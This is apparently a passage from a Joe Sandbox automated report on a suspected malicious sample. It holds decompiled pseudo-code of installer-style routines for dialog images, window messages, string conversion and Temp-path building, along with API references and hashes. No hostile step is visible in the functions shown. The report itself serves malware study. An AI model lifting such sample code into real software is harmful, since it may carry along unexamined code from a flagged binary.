                                                              									 *__edi = E6F6713B1(__ebp);
                                                              									__edi[1] = __edx;
                                                              									goto L27;
                                                              								case 3:
                                                              									__eax = GlobalAlloc(0x40,  *0x6f67506c);
                                                              									 *(__esi + 0x1c) = __eax;
                                                              									__edx = 0;
                                                              									 *__edi = __eax;
                                                              									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x6f67506c, __eax,  *0x6f67506c, 0, 0);
                                                              									goto L27;
                                                              								case 4:
                                                              									__eax = E6F6712CC(__ebp);
                                                              									 *(__esi + 0x1c) = __eax;
                                                              									L21:
                                                              									 *__edi = __eax;
                                                              									goto L27;
                                                              								case 5:
                                                              									__eax = GlobalAlloc(0x40, 0x10);
                                                              									_push(__eax);
                                                              									 *(__esi + 0x1c) = __eax;
                                                              									_push(__ebp);
                                                              									 *__edi = __eax;
                                                              									__imp__CLSIDFromString();
                                                              									goto L27;
                                                              								case 6:
                                                              									if( *__ebp != __cx) {
                                                              										__eax = E6F6713B1(__ebp);
                                                              										 *__ebx = __eax;
                                                              									}
                                                              									goto L27;
                                                              								case 7:
                                                              									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                              									( *(__esi + 0x18) - 1) *  *0x6f67506c =  *0x6f675074 + ( *(__esi + 0x18) - 1) *  *0x6f67506c * 2 + 0x18;
                                                              									 *__ebx =  *0x6f675074 + ( *(__esi + 0x18) - 1) *  *0x6f67506c * 2 + 0x18;
                                                              									asm("cdq");
                                                              									__eax = E6F671510(__edx,  *0x6f675074 + ( *(__esi + 0x18) - 1) *  *0x6f67506c * 2 + 0x18, __edx,  *0x6f675074 + ( *(__esi + 0x18) - 1) *  *0x6f67506c * 2);
                                                              									goto L27;
                                                              							}
                                                              						}
                                                              					}
                                                              					L9:
                                                              					_t37 = E6F6712CC(0x6f675044);
                                                              					goto L10;
                                                              				}
                                                              			}











                                                              0x6f672494
                                                              0x6f672498
                                                              0x6f6724a3
                                                              0x6f6724a3
                                                              0x6f6724aa
                                                              0x6f6724af
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6724b3
                                                              0x6f6724b6
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6724bb
                                                              0x6f6724c6
                                                              0x6f6724d6
                                                              0x00000000
                                                              0x6f6724cd
                                                              0x6f6724cf
                                                              0x6f6724e5
                                                              0x00000000
                                                              0x6f6724e5
                                                              0x6f6724bd
                                                              0x6f6724bd
                                                              0x6f6724e6
                                                              0x6f6724e6
                                                              0x6f6724e8
                                                              0x6f6724ec
                                                              0x6f6724ec
                                                              0x6f6724ef
                                                              0x6f6724ef
                                                              0x6f6724f7
                                                              0x6f6724ff
                                                              0x6f672502
                                                              0x6f6725c1
                                                              0x6f6725c2
                                                              0x6f6725cd
                                                              0x6f6725f7
                                                              0x6f6725f7
                                                              0x6f6725dd
                                                              0x6f6725e9
                                                              0x6f6725df
                                                              0x6f6725df
                                                              0x6f6725df
                                                              0x00000000
                                                              0x6f672508
                                                              0x6f672508
                                                              0x00000000
                                                              0x6f67250f
                                                              0x00000000
                                                              0x00000000
                                                              0x6f672517
                                                              0x00000000
                                                              0x00000000
                                                              0x6f672525
                                                              0x6f672527
                                                              0x00000000
                                                              0x00000000
                                                              0x6f672548
                                                              0x6f67254e
                                                              0x6f672551
                                                              0x6f672553
                                                              0x6f672563
                                                              0x00000000
                                                              0x00000000
                                                              0x6f672530
                                                              0x6f672535
                                                              0x6f672538
                                                              0x6f672539
                                                              0x00000000
                                                              0x00000000
                                                              0x6f67256f
                                                              0x6f672575
                                                              0x6f672576
                                                              0x6f672579
                                                              0x6f67257a
                                                              0x6f67257c
                                                              0x00000000
                                                              0x00000000
                                                              0x6f672588
                                                              0x6f67258b
                                                              0x6f672597
                                                              0x6f672599
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6725a5
                                                              0x6f6725b1
                                                              0x6f6725b4
                                                              0x6f6725b6
                                                              0x6f6725b9
                                                              0x00000000
                                                              0x00000000
                                                              0x6f672508
                                                              0x6f672502
                                                              0x6f6724db
                                                              0x6f6724e0
                                                              0x00000000
                                                              0x6f6724e0

                                                              APIs
                                                              • GlobalFree.KERNEL32(00000000), ref: 6F6725C2
                                                                • Part of subcall function 6F6712CC: lstrcpynW.KERNEL32(00000000,?,6F67137F,00000019,6F6711CA,-000000A0), ref: 6F6712DC
                                                              • GlobalAlloc.KERNEL32(00000040), ref: 6F672548
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6F672563
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62505218441.000000006F671000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F670000, based on PE: true
                                                              • Associated: 00000001.00000002.62505168749.000000006F670000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.62505286401.000000006F674000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.62505338915.000000006F676000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6f670000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                              • String ID:
                                                              • API String ID: 4216380887-0
                                                              • Opcode ID: 46c2082ca164f826451f55cfe0e337ca4573326042900e8033c352cc9f48dbea
                                                              • Instruction ID: fc5b92794fa1e5a18452f671933965f71c32929549161c2045456ff9a883cac7
                                                              • Opcode Fuzzy Hash: 46c2082ca164f826451f55cfe0e337ca4573326042900e8033c352cc9f48dbea
                                                              • Instruction Fuzzy Hash: 5E41D0B0408705EFE738DF3AD954AA677F8FB46324F108A1EE54686180EF70A584CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 77%
                                                              			E00401D81(void* __ebx, void* __edx) {
                                                              				struct HWND__* _t30;
                                                              				WCHAR* _t38;
                                                              				void* _t48;
                                                              				void* _t53;
                                                              				signed int _t55;
                                                              				signed int _t60;
                                                              				long _t63;
                                                              				void* _t65;
                                                              
                                                              				_t53 = __ebx;
                                                              				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                              					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                              				} else {
                                                              					E00402D84(2);
                                                              					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                              				}
                                                              				_t55 =  *(_t65 - 0x24);
                                                              				 *(_t65 + 8) = _t30;
                                                              				_t60 = _t55 & 0x00000004;
                                                              				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                              				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                              				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                              				if((_t55 & 0x00010000) == 0) {
                                                              					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                              				} else {
                                                              					_t38 = E00402DA6(0x11);
                                                              				}
                                                              				 *(_t65 - 0x44) = _t38;
                                                              				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                              				asm("sbb esi, esi");
                                                              				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                              				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                              				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                              					DeleteObject(_t48);
                                                              				}
                                                              				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                              					_push(_t63);
                                                              					E004065AF();
                                                              				}
                                                              				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
                                                              				return 0;
                                                              			}











                                                              0x00401d81
                                                              0x00401d85
                                                              0x00401d9a
                                                              0x00401d87
                                                              0x00401d89
                                                              0x00401d8f
                                                              0x00401d8f
                                                              0x00401da0
                                                              0x00401da3
                                                              0x00401dad
                                                              0x00401db0
                                                              0x00401db8
                                                              0x00401dc9
                                                              0x00401dcc
                                                              0x00401dd7
                                                              0x00401dce
                                                              0x00401dd0
                                                              0x00401dd0
                                                              0x00401ddb
                                                              0x00401de5
                                                              0x00401e0c
                                                              0x00401e1b
                                                              0x00401e29
                                                              0x00401e31
                                                              0x00401e39
                                                              0x00401e39
                                                              0x00401e42
                                                              0x00401e48
                                                              0x00402ba4
                                                              0x00402ba4
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                              • GetClientRect.USER32(?,?), ref: 00401DE5
                                                              • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                              • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                              • DeleteObject.GDI32(00000000), ref: 00401E39
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                              • String ID:
                                                              • API String ID: 1849352358-0
                                                              • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                              • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                              • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                              • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E6F6716BD(struct HINSTANCE__* _a4, short* _a8) {
                                                              				_Unknown_base(*)()* _t7;
                                                              				void* _t10;
                                                              				int _t14;
                                                              
                                                              				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                              				_t10 = GlobalAlloc(0x40, _t14);
                                                              				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                              				_t7 = GetProcAddress(_a4, _t10);
                                                              				GlobalFree(_t10);
                                                              				return _t7;
                                                              			}






                                                              0x6f6716d7
                                                              0x6f6716e3
                                                              0x6f6716f0
                                                              0x6f6716f7
                                                              0x6f671700
                                                              0x6f67170c

                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6F6722D8,?,00000808), ref: 6F6716D5
                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6F6722D8,?,00000808), ref: 6F6716DC
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6F6722D8,?,00000808), ref: 6F6716F0
                                                              • GetProcAddress.KERNEL32(6F6722D8,00000000), ref: 6F6716F7
                                                              • GlobalFree.KERNEL32(00000000), ref: 6F671700
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62505218441.000000006F671000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F670000, based on PE: true
                                                              • Associated: 00000001.00000002.62505168749.000000006F670000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.62505286401.000000006F674000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.62505338915.000000006F676000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6f670000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                              • String ID:
                                                              • API String ID: 1148316912-0
                                                              • Opcode ID: 287e87b48aca0e52f8be80f18dca9367f9d9d7cd1fdbf50d6f9a3471c094ac28
                                                              • Instruction ID: 1d7dd13549e20057aca14e4ce1caf2b6c259a74aa274f4c96fb95e38c5835300
                                                              • Opcode Fuzzy Hash: 287e87b48aca0e52f8be80f18dca9367f9d9d7cd1fdbf50d6f9a3471c094ac28
                                                              • Instruction Fuzzy Hash: 0DF0AC72206538BBDA211BA78C4CC9BBE9CEF8B2F9B110215F628921A096A15D11D7F1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 59%
                                                              			E00401C43(intOrPtr __edx) {
                                                              				int _t29;
                                                              				long _t30;
                                                              				signed int _t32;
                                                              				WCHAR* _t35;
                                                              				long _t36;
                                                              				int _t41;
                                                              				signed int _t42;
                                                              				int _t46;
                                                              				int _t56;
                                                              				intOrPtr _t57;
                                                              				struct HWND__* _t63;
                                                              				void* _t64;
                                                              
                                                              				_t57 = __edx;
                                                              				_t29 = E00402D84(3);
                                                              				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                              				 *(_t64 - 0x18) = _t29;
                                                              				_t30 = E00402D84(4);
                                                              				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                              				 *(_t64 + 8) = _t30;
                                                              				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                              					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                              				}
                                                              				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                              				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                              					 *(_t64 + 8) = E00402DA6(0x44);
                                                              				}
                                                              				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                              				_push(1);
                                                              				if(__eflags != 0) {
                                                              					_t61 = E00402DA6();
                                                              					_t32 = E00402DA6();
                                                              					asm("sbb ecx, ecx");
                                                              					asm("sbb eax, eax");
                                                              					_t35 =  ~( *_t31) & _t61;
                                                              					__eflags = _t35;
                                                              					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                              					goto L10;
                                                              				} else {
                                                              					_t63 = E00402D84();
                                                              					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                              					_t41 = E00402D84(2);
                                                              					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                              					_t56 =  *(_t64 - 0x1c) >> 2;
                                                              					if(__eflags == 0) {
                                                              						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                              						L10:
                                                              						 *(_t64 - 0x38) = _t36;
                                                              					} else {
                                                              						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                              						asm("sbb eax, eax");
                                                              						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                              					}
                                                              				}
                                                              				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                              				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                              					_push( *(_t64 - 0x38));
                                                              					E004065AF();
                                                              				}
                                                              				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
                                                              				return 0;
                                                              			}















                                                              0x00401c43
                                                              0x00401c45
                                                              0x00401c4c
                                                              0x00401c4f
                                                              0x00401c52
                                                              0x00401c5c
                                                              0x00401c60
                                                              0x00401c63
                                                              0x00401c6c
                                                              0x00401c6c
                                                              0x00401c6f
                                                              0x00401c73
                                                              0x00401c7c
                                                              0x00401c7c
                                                              0x00401c7f
                                                              0x00401c83
                                                              0x00401c85
                                                              0x00401cda
                                                              0x00401cdc
                                                              0x00401ce7
                                                              0x00401cf1
                                                              0x00401cf4
                                                              0x00401cf4
                                                              0x00401cfd
                                                              0x00000000
                                                              0x00401c87
                                                              0x00401c8e
                                                              0x00401c90
                                                              0x00401c93
                                                              0x00401c99
                                                              0x00401ca0
                                                              0x00401ca3
                                                              0x00401ccb
                                                              0x00401d03
                                                              0x00401d03
                                                              0x00401ca5
                                                              0x00401cb3
                                                              0x00401cbb
                                                              0x00401cbe
                                                              0x00401cbe
                                                              0x00401ca3
                                                              0x00401d06
                                                              0x00401d09
                                                              0x00401d0f
                                                              0x00402ba4
                                                              0x00402ba4
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Timeout
                                                              • String ID: !
                                                              • API String ID: 1777923405-2657877971
                                                              • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                              • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                              • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                              • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 58%
                                                              			E00405F37(WCHAR* _a4) {
                                                              				WCHAR* _t9;
                                                              
                                                              				_t9 = _a4;
                                                              				_push( &(_t9[lstrlenW(_t9)]));
                                                              				_push(_t9);
                                                              				if( *(CharPrevW()) != 0x5c) {
                                                              					lstrcatW(_t9, 0x40a014);
                                                              				}
                                                              				return _t9;
                                                              			}




                                                              0x00405f38
                                                              0x00405f45
                                                              0x00405f46
                                                              0x00405f51
                                                              0x00405f59
                                                              0x00405f59
                                                              0x00405f61

                                                              APIs
                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrcatlstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 2659869361-3355392842
                                                              • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                              • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                              • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                              • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 91%
                                                              			E6F6710E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                                                              				void* _v0;
                                                              				void* _t27;
                                                              				signed int _t29;
                                                              				void* _t30;
                                                              				void* _t34;
                                                              				void* _t36;
                                                              				void* _t38;
                                                              				void* _t40;
                                                              				void* _t48;
                                                              				void* _t54;
                                                              				void* _t63;
                                                              				void* _t64;
                                                              				signed int _t66;
                                                              				void* _t67;
                                                              				void* _t73;
                                                              				void* _t74;
                                                              				void* _t77;
                                                              				void* _t80;
                                                              				void _t81;
                                                              				void _t82;
                                                              				intOrPtr _t84;
                                                              				void* _t86;
                                                              				void* _t88;
                                                              
                                                              				 *0x6f67506c = _a8;
                                                              				 *0x6f675070 = _a16;
                                                              				 *0x6f675074 = _a12;
                                                              				_a12( *0x6f675048, E6F671651, _t73);
                                                              				_t66 =  *0x6f67506c +  *0x6f67506c * 4 << 3;
                                                              				_t27 = E6F6712E3();
                                                              				_v0 = _t27;
                                                              				_t74 = _t27;
                                                              				if( *_t27 == 0) {
                                                              					L28:
                                                              					return GlobalFree(_t27);
                                                              				}
                                                              				do {
                                                              					_t29 =  *_t74 & 0x0000ffff;
                                                              					_t67 = 2;
                                                              					_t74 = _t74 + _t67;
                                                              					_t88 = _t29 - 0x66;
                                                              					if(_t88 > 0) {
                                                              						_t30 = _t29 - 0x6c;
                                                              						if(_t30 == 0) {
                                                              							L23:
                                                              							_t31 =  *0x6f675040;
                                                              							if( *0x6f675040 == 0) {
                                                              								goto L26;
                                                              							}
                                                              							E6F671603( *0x6f675074, _t31 + 4, _t66);
                                                              							_t34 =  *0x6f675040;
                                                              							_t86 = _t86 + 0xc;
                                                              							 *0x6f675040 =  *_t34;
                                                              							L25:
                                                              							GlobalFree(_t34);
                                                              							goto L26;
                                                              						}
                                                              						_t36 = _t30 - 4;
                                                              						if(_t36 == 0) {
                                                              							L13:
                                                              							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                                                              							_t74 = _t74 + _t67;
                                                              							_t34 = E6F671312(E6F67135A(_t38));
                                                              							L14:
                                                              							goto L25;
                                                              						}
                                                              						_t40 = _t36 - _t67;
                                                              						if(_t40 == 0) {
                                                              							L11:
                                                              							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                                                              							_t74 = _t74 + _t67;
                                                              							_t34 = E6F671381(_t80, E6F6712E3());
                                                              							goto L14;
                                                              						}
                                                              						L8:
                                                              						if(_t40 == 1) {
                                                              							_t81 = GlobalAlloc(0x40, _t66 + 4);
                                                              							_t10 = _t81 + 4; // 0x4
                                                              							E6F671603(_t10,  *0x6f675074, _t66);
                                                              							_t86 = _t86 + 0xc;
                                                              							 *_t81 =  *0x6f675040;
                                                              							 *0x6f675040 = _t81;
                                                              						}
                                                              						goto L26;
                                                              					}
                                                              					if(_t88 == 0) {
                                                              						_t48 =  *0x6f675070;
                                                              						_t77 =  *_t48;
                                                              						 *_t48 =  *_t77;
                                                              						_t49 = _v0;
                                                              						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                                                              						if( *((short*)(_t77 + 4)) == 0x2691) {
                                                              							E6F671603(_t49, _t77 + 8, 0x38);
                                                              							_t86 = _t86 + 0xc;
                                                              						}
                                                              						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                                                              						GlobalFree(_t77);
                                                              						goto L26;
                                                              					}
                                                              					_t54 = _t29 - 0x46;
                                                              					if(_t54 == 0) {
                                                              						_t82 = GlobalAlloc(0x40,  *0x6f67506c +  *0x6f67506c + 8);
                                                              						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                                                              						_t14 = _t82 + 8; // 0x8
                                                              						E6F671603(_t14, _v0, 0x38);
                                                              						_t86 = _t86 + 0xc;
                                                              						 *_t82 =  *( *0x6f675070);
                                                              						 *( *0x6f675070) = _t82;
                                                              						goto L26;
                                                              					}
                                                              					_t63 = _t54 - 6;
                                                              					if(_t63 == 0) {
                                                              						goto L23;
                                                              					}
                                                              					_t64 = _t63 - 4;
                                                              					if(_t64 == 0) {
                                                              						 *_t74 =  *_t74 + 0xa;
                                                              						goto L13;
                                                              					}
                                                              					_t40 = _t64 - _t67;
                                                              					if(_t40 == 0) {
                                                              						 *_t74 =  *_t74 + 0xa;
                                                              						goto L11;
                                                              					}
                                                              					goto L8;
                                                              					L26:
                                                              				} while ( *_t74 != 0);
                                                              				_t27 = _v0;
                                                              				goto L28;
                                                              			}


























                                                              0x6f6710eb
                                                              0x6f671100
                                                              0x6f671109
                                                              0x6f67110e
                                                              0x6f671119
                                                              0x6f67111c
                                                              0x6f671125
                                                              0x6f671129
                                                              0x6f67112b
                                                              0x6f6712b0
                                                              0x6f6712ba
                                                              0x6f6712ba
                                                              0x6f671132
                                                              0x6f671132
                                                              0x6f671137
                                                              0x6f671138
                                                              0x6f67113a
                                                              0x6f67113d
                                                              0x6f671256
                                                              0x6f671259
                                                              0x6f671271
                                                              0x6f671271
                                                              0x6f671278
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671285
                                                              0x6f67128a
                                                              0x6f67128f
                                                              0x6f671294
                                                              0x6f67129a
                                                              0x6f67129b
                                                              0x00000000
                                                              0x6f67129b
                                                              0x6f67125b
                                                              0x6f67125e
                                                              0x6f6711bc
                                                              0x6f6711bf
                                                              0x6f6711c2
                                                              0x6f6711cb
                                                              0x6f6711d0
                                                              0x00000000
                                                              0x6f6711d1
                                                              0x6f671264
                                                              0x6f671266
                                                              0x6f6711a2
                                                              0x6f6711a5
                                                              0x6f6711a8
                                                              0x6f6711b1
                                                              0x00000000
                                                              0x6f6711b1
                                                              0x6f671164
                                                              0x6f671165
                                                              0x6f671177
                                                              0x6f671180
                                                              0x6f671184
                                                              0x6f67118e
                                                              0x6f671191
                                                              0x6f671193
                                                              0x6f671193
                                                              0x00000000
                                                              0x6f671165
                                                              0x6f671143
                                                              0x6f671218
                                                              0x6f67121d
                                                              0x6f671221
                                                              0x6f671223
                                                              0x6f67122c
                                                              0x6f67122f
                                                              0x6f671238
                                                              0x6f67123d
                                                              0x6f67123d
                                                              0x6f671247
                                                              0x6f67124a
                                                              0x00000000
                                                              0x6f671250
                                                              0x6f671149
                                                              0x6f67114c
                                                              0x6f6711e9
                                                              0x6f6711ed
                                                              0x6f6711f7
                                                              0x6f6711fb
                                                              0x6f671205
                                                              0x6f67120a
                                                              0x6f671211
                                                              0x00000000
                                                              0x6f671211
                                                              0x6f671152
                                                              0x6f671155
                                                              0x00000000
                                                              0x00000000
                                                              0x6f67115b
                                                              0x6f67115e
                                                              0x6f6711b8
                                                              0x00000000
                                                              0x6f6711b8
                                                              0x6f671160
                                                              0x6f671162
                                                              0x6f67119e
                                                              0x00000000
                                                              0x6f67119e
                                                              0x00000000
                                                              0x6f6712a1
                                                              0x6f6712a1
                                                              0x6f6712ab
                                                              0x00000000

                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 6F671171
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 6F6711E3
